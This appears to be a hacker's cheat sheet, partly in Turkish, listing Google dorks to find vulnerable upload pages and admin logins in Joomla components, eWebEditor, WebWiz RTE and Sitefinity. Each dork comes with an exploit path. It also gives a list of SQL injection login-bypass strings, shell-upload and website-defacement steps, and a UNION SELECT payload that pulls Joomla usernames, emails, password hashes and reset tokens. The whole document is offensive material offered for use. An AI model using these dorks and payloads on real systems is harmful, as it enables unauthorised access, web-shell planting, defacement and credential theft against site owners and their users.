inurl:”/admin/saveannounce_upload.asp” inurl:”admin/eWebEditor/Upload.asp” inurl:”UploadFile/upload.asp” #WEBWİZ ACİGİ (RTE UPLOAD ACIGI ) inurl:rte/my_documents/my_files/ inurl:/my_documents/my_files/ #exloit: /rte/RTE_popup_file_atch.asp #Editör açığı inurl:editor/assetmanager/ #(arama kodu geliştirilebilir) #EXPLOİT : /Editor/assetmanager/assetmanager.asp #Joomla upload açıgı inurl index.php?option=com_expose #Exploit: administrator/components/com_expose/uploadimg.php #Uploadin gittigi yer : /components/com_expose/expose/img/ #Sitefinity: Login upload açıgı inurl:”Sitefinity: Login” #exploit: Sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx #Auto Login For Joomla Dork .:old:. inurl:/administrator/index.php?autologin=1 #--- #BYPASS ADMIN ACCESS #Dorks: #Code: inurl:admin.asp inurl:adminlogin.aspx inurl:admin/index.php inurl:administrator.php inurl:administrator.asp inurl:login.asp inurl:login.aspx inurl:login.php inurl:admin/index.php inurl:adminlogin.aspx #Code: #‘ or 1=1 – #1'or’1'=’1 #admin’– #” or 0=0 – #or 0=0 – #‘ or 0=0 # #” or 0=0 # #or 0=0 # #‘ or ‘x’='x #” or “x”=”x #‘) or (‘x’='x #‘ or 1=1– #” or 1=1– #or 1=1– #‘ or a=a– #” or “a”=”a #‘) or (‘a’='a #“) or (“a”=”a #hi” or “a”=”a #hi” or 1=1 – #hi’ or 1=1 – #hi’ or ‘a’='a #hi’) or (‘a’='a #---- #Joomla Component com_smartformer shell upload #Google Dork inurl:"index.php?option=com_smartformer" #& upload shell.php #Your shell : #http://localhost/components/com_smartformer/files/yourshell.php #--- #Ministry Web Designing Multiple Vulnerabilities #exploit bypass to login: #user: '=' 'or' #pass: '=' 'or' #Vunlerable Sections: inurl:/downloadcounter/admin/login.php inurl:/mediaprogram/admin/index.php inurl:/churchprogram/login.php #---- #(Deface)Exploit (Remote Deface ) Joomla Component #Dork : inurl:index.php?option=com_fabrik #Exploit : /index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1 #--- #[Priv8] Joomla Com_content exploit - defacing joomla websites #Dork : inurl:index.php?option=com_content & "/mambots/editors/fckeditor" #Vulnerable File : mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php #You can exploit this vulnerable joomla component and deface joomla wesbites and you can also sometimes upload your shell #---- #exploit joomla "com_artforms" reset password #Dork : inurl:"option com_artforms" #/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users-- #/index.php?option=com_user&view=reset #/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users